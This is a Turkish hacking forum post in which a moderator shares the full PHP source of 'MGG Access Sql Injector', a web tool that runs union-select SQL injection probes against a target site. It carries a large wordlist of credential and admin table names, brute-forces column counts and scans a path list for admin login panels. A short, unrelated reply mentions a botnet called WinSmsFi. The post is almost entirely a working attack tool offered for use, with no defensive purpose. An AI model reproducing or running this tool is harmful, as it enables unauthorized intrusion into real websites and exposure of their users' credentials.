MGG Access Sql Injector

G3nzo

Moderator
Katılım
20 Eyl 2012
Mesajlar
1,992
Tepkime puanı
0
Puanları
36
Kod:
<?php

include ( "tara.php" );
$tarayici = new tarayiciTipi();
$tarayici->TarayiciAl();

if ( $tarayici->tarayiciKimlik == "ff" )
{
header ("Location:http://google.com");
}
else
{
//
}
//Kodlayan ajans
//www.ajanlar.org
//Tesekkur : ajanlar.org
ob_start();
set_time_limit (0);
error_reporting (0);
function GET($adres) {
		$soket = curl_init();
	 	$header[] = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
		$header[] = "Cache-Control: max-age=0";
		$header[] = "Connection: keep-alive";
		$header[] = "Keep-Alive: 300";
		$header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
		$header[] = "Accept-Language: en-us,en;q=0.5";
		$header[] = "Pragma: "; 
	 	curl_setopt($soket, CURLOPT_URL, $adres);
		curl_setopt($soket, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
		curl_setopt($soket, CURLOPT_HTTPHEADER, $header);
		curl_setopt($soket, CURLOPT_REFERER, 'http://www.google.com');
		curl_setopt($soket, CURLOPT_ENCODING, 'gzip,deflate');
		curl_setopt($soket, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($soket, CURLOPT_TIMEOUT, 10);
		if (!$kodlar = curl_exec($soket)) { 
			$kodlar = file_get_contents($adres);
 		 }
		curl_close($soket);
		return $kodlar; 
}
$mgg=$_GET ["mgg"];
if ($mgg==""){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
  <table width="200" align="center">
    <tr>
      <td class="yazi">Site</td>
      <td><form id="form2" name="form2" method="post" action="">
        <label>
          <input name="site" type="text" class="input" id="site" />
        </label></td>
    </tr>
    <tr>
      <td class="yazi">Table</td>
      <td>
        <label>
          <textarea name="tablo" cols="45" rows="5" class="textarea" id="tablo">tblclients
tblservers
sb_host_admin
tbl_user
tbladmins
Art
_wfspro_admin
4images_users
a_admin
Konto
Konten
adm
admin
admin_login
admin_user
admin_userinfo
verwalten
verwaltet
administrieren
Verwaltung
Administrator
Administratoren
adminrights
Admins
adminuser
Kunst
article_admin
Artikel
artikel
aut
Autor
Autore
Backend
backend_users
backenduser
BBS
Buch
chat_config
chat_messages
chat_users
Client
Kunden
clubconfig
Firma
config
Kontakt
Kontakte
Inhalt
Kontrolle
cpg_config
cpg132_users
Kunde
customers_basket
dbadmins
Händler
Tagebuch
herunterladen
Dragon_users
e107.e107_user
e107_user
forum.ibf_members
fusion_user_groups
fusion_users
Gruppe
Gruppen
ibf_admin_sessions
ibf_conf_settings
ibf_members
ibf_members_converge
ibf_sessions
icq
Bilder
Index
info
ipb.ibf_members
ipb_sessions
joomla_users
jos_blastchatc_users
jos_comprofiler_members
jos_contact_details
jos_joomblog_users
jos_messages_cfg
jos_moschat_users
jos_users
knews_lostpass
Mitgliederbereich
kpro_adminlogs
kpro_user
Links
Anmeldung
login_admin
login_admins
login_user
login_users
Logins
Protokolle
lost_pass
lost_passwords
lostpass
lostpasswords
m_admin
hauptsächlich
mambo_session
mambo_users
Manager
mb_users
Mitglied
Mitgliederliste
Mitglieder
minibbtable_users
Film
Filme
mybb_users
mysql
mysql.user
Name
Namen
News
news_lostpass
Newsletter
nuke_authors
nuke_bbconfig
nuke_config
nuke_popsettings
nuke_users
obb_profiles
Auftrag
Bestellungen
Parol
Partner
Pässe
Passwort
Passwörter
perdorues
perdoruesit
phorum_session
phorum_user
phorum_users
phpads_clients
phpads_config
phpbb_users
phpBB2.forum_users
phpBB2.phpbb_users
phpmyadmin.pma_table_info
pma_table_info
poll_user
punbb_users
pwd
pwds
reg_user
reg_users
registriert
reguser
regusers
Tagung
Sitzungen
Einstellungen
shop.cards
shop.orders
site_login
site_logins
sitelogin
sitelogins
Standorte
smallnuke_members
smf_members
SS_orders
Statistiken
Superuser
sysadmin
Systemadministratoren
System
sysuser
sysusers
Tisch
Tabellen
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tb_usernames
tb_users
tbl
tbl_users
tbluser
tbl_clients
tbl_client
tblclients
tblclient
Test
usebb_members
Benutzer
user_admin
user_info
user_list
user_login
user_logins
user_names
UserControl
UserInfo
Benutzerliste
userlogins
Benutzername
Benutzernamen
Userrights
vb_user
vbulletin_session
vbulletin_user
voodoo_members
webadmin
webadmins
Webmaster
Webuser
Webbenutzer
x_admin
xar_roles
xoops_bannerclient
xoops_users
yabb_settings
yabbse_settings
ACT_INFO
ActiveDataFeed
Kategorie
CategoryGroup
ChicksPass
ClickTrack
Land
CountryCodes1
CustomNav
DataFeedPerformance1
DataFeedPerformance2
DataFeedPerformance2_incoming
DataFeedShowtag1
DataFeedShowtag2
DataFeedShowtag2_incoming
dtproperties
Event
Event_backup
Event_Category
EventRedirect
Events_new
Genre
JamPass
MyTicketek
MyTicketekArchive
Passwörter durch Nutzung zählen
PerfPassword
PerfPasswordAllSelected
Promotion
ProxyDataFeedPerformance
ProxyDataFeedShowtag
ProxyPriceInfo
Region
Suchoptionen
Serie
Sheldonshows
StateList
Staaten
UnterkKlasse
Anhand des Sachgebietes
Umfrage
SurveyAnswer
SurveyAnswerOpen
SurveyQuestion
SurveyRespondent
sysconstraints
syssegments
tblRestrictedPasswords
tblRestrictedShows
Ticket-System ACC-Nummern
TIMEDIFF
Titel
ToPacmail1
ToPacmail2
Total Members
UserPreferences
uvw_Category
uvw_Pref
uvw_Preferences
Veranstaltungsort
Veranstaltungsorte
VenuesNew
X_3945
Stein Liste
tblArtistCategory
tblArtists
tblConfigs
tblLayouts
tblLogBookAuthor
tblLogBookEntry
tblLogBookImages
tblLogBookImport
tblLogBookUser
tblMails
tblNewCategory
tblNews
tblOrders
tblStoneCategory
tblStones
tblUser
tblWishList
Ansicht1
viewLogBookEntry
viewStoneArtist
vwListAllAvailable
CC_info
CC_username
cms_user
cms_users
cms_admin
cms_admins
sort
account
accounts
administer
administrable
administrate
administration
administrator
administrators
admins
art
articles
author
autore
backend
bbs
book
client
clients
company
contact
contacts
content
control
customer
customers
dealer
dealers
diary
download
group
groups
images
index
korisnici
links
login
logins
logon
logs
main
manage
manager
member
memberlist
members
mitglieder
movie
movies
name
names
news
newsletter
order
orders
parol
partner
partners
passes
password
passwords
registered
session
sessions
settings
sites
statistics
superuser
sysadmins
system
table
tables
test
user
usercontrol
userinfo
userlist
username
usernames
userrights
users
webmaster
webmasters
webuser
webusers
Category
Country
Passwords by usage count
SearchOptions
Series
States
SubCategory
Subjects
Survey
Ticket System Acc Numbers
TimeDiff
Titles
Venue
venues
stone list
VIEW1
utilisateur
trier
compte
comptes
administrer
administrables
administrateur
administrateurs
auteur
livre
entreprise
Contact
contenu
controle
concessionnaire
concessionnaires
journal
telecharger
groupe
groupes
liens
connexion
principal
gestionnaire
membre
membres
film
films
nom
noms
ordre
commandes
partenaire
partenaires
passe
asse
personnes handicapes
enregistrs
paramtres
SITELOGIN
statistiques
super
systime
tester
utilisateurs
WebAdmin
utlisateur
Catogorie
Pays
Sujets
Sondage
Titres
membres
Lieux
pierreliste
Affichage1</textarea></td>
    </tr>
  </table>
    <label>
	<div align="center">
      <input name="basla" type="submit" class="submit" id="basla" value="Table Brute" />
    </label>
  <p class="link">&nbsp;  </p>
    <p>
      <label>
        </div>
      </label>
    </p>
</form>
</body>
</html>';
if (isset ($_POST ["basla"])){
$site=$_POST ['site'];
$ekle="+union+select+0+from+";
$tablo=$_POST ['tablo'];
$parca=explode ("\r\n",$tablo);
	foreach ($parca as $tabloson){
	$url=$site.$ekle.$tabloson;
	$ac=GET ($url);
	if (eregi ("The number of columns",$ac)){
	echo "<b>Found Table=> </b>".$url."<br>";
	ob_flush ();
	flush ();
	}
	else
	{
	echo $url."<br>";
    ob_flush ();
	flush ();
	}
	
	}	
}
}
if ($mgg=="kolon"){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	text-align: center;
	margin: auto;
	clip: rect(auto,auto,auto,auto);
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
<table width="200" align="center">
  <tr>
    <td class="yazi">Target</td>
    <td><form id="form1" name="form1" method="post" action="">
      <label>
        <input name="kolonbu" type="text" class="input" id="kolonbu" />
      </label>
    </td>
  </tr>
  <tr>
    <td class="yazi">Table</td>
    <td>
      <label>
        <input name="tablosay" type="text" class="input" id="tablosay" />
      </label>
    </td>
  </tr>
  <tr align="center">
    <td colspan="2">
      <label>
        <input name="basla" type="submit" class="submit" id="basla" value="Brute Colomn" />
      </label>
    </form></td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>';
if (isset ($_POST ["basla"])){
$kolon=$_POST ["kolonbu"];
for($i=0;$i<=20;$i++){
if($i==0){
$kolonsay.=$i;
}else{
$kolonsay.=",".$i;
}
$tablosay=$_POST ["tablosay"];
$sayfaac=$kolon."+union+select+".$kolonsay."+from+".$tablosay."";
$ie=GET ($sayfaac);
if (!eregi ("The number of columns",$ie))
{
echo "<b>Found Colomn=> </b> ".$sayfaac."<br>";
	ob_flush ();
	flush ();
}


}
}

}
//admin panel brute
if ($mgg=="admin"){
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MGG Access Sql Injecter & Control Panel Finder</title>
<style type="text/css">
<!--
body {
	background-color: #9CF;
}
.sayfa {
	font-family: Cambria;
	margin: auto;
	text-align: center;
	font-size: 24px;
	font-weight: bolder;
	color: #006;
}
.link {
	font-family: Cambria;
	font-size: 14px;
	color: #F00;
}
.input {
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
	height: 20px;
	width: 250px;
}
.textarea {
	height: 100px;
	width: 250px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.submit {
	font-family: Cambria;
	color: #FFF;
	font-weight: bolder;
	background-color: #000;
	width: 100px;
	border-top-style: double;
	border-right-style: double;
	border-bottom-style: double;
	border-left-style: double;
}
.yazi {
	font-family: "Franklin Gothic Book";
	font-size: medium;
	color: #000;
	font-weight: bolder;
	margin: auto;
	float: none;
	clear: left;
}
a:link {
	color: #F00;
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
-->
</style></head>

<body>

<div class="sayfa">
  <p>MGG Access Sql Injector</p>
  <p class="link"><a href="?">Table Brute </a> | <a href="?mgg=kolon">Colomn Brute</a> | <a href="?mgg=admin">Admin Brute</a></p></div>
  <table width="200" align="center">
    <tr>
      <td class="yazi">Target</td>
      <td><form id="form2" name="form2" method="post" action="">
        <label>
          <input name="abul" type="text" class="input" id="abul" />
        </label></td>
    </tr>
    <tr>
      <td class="yazi">Paths</td>
      <td>
        <label>
          <textarea name="path" cols="45" rows="5" class="textarea" id="path">admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/</textarea></td>
    </tr>
  </table>
    <label>
	<div align="center">
      <input name="basla" type="submit" class="submit" id="basla" value="Find Admin" />
    </label>
  <p class="link">&nbsp;  </p>
    <p>
      <label>
        </div>
      </label>
    </p>
</form>
</body>
</html>';
if (isset ($_POST ["basla"])){
Function status ($baglan){
global $girsay;
$ch = curl_init(); // tesekkurler php.net :)
if (!$ch) {
    die("Couldn't initialize a cURL handle");
}
$ret = curl_setopt($ch, CURLOPT_URL,$baglan);
$ret = curl_setopt($ch, CURLOPT_HEADER,         1);
$ret = curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ret = curl_setopt($ch, CURLOPT_TIMEOUT,        30);
$ret = curl_exec($ch);
if (empty($ret)) {
    die(curl_error($ch));
    curl_close($ch); 
} else {
    $info = curl_getinfo($ch);
    curl_close($ch);
}
if($info['http_code']=="200")
{
echo "<b>Found Control Panel=> </b> ".$girsay."<br>";
	ob_flush ();
	flush ();
}

}
$hedefs=$_POST ["abul"];
$yol=$_POST ["path"];
$bol=explode ("\r\n",$yol);
foreach ($bol as $sonis){
$girsay=$hedefs.$sonis;
$statal=status ($girsay);





}




}
}



?>
 

zzzzzmman

Yeni Üye
Katılım
9 Ocak 2015
Mesajlar
1
Tepkime puanı
0
Puanları
0
Genellikle hatta %99 botnet ismidir WinSmsFi dir.

Sağ taraftan WinSmsFi'yi Buluyoruz eğer yoksa en aşşağıdaki muhtemelen botnettir.
 
Üst
Copyright® Ajanlar.org 2012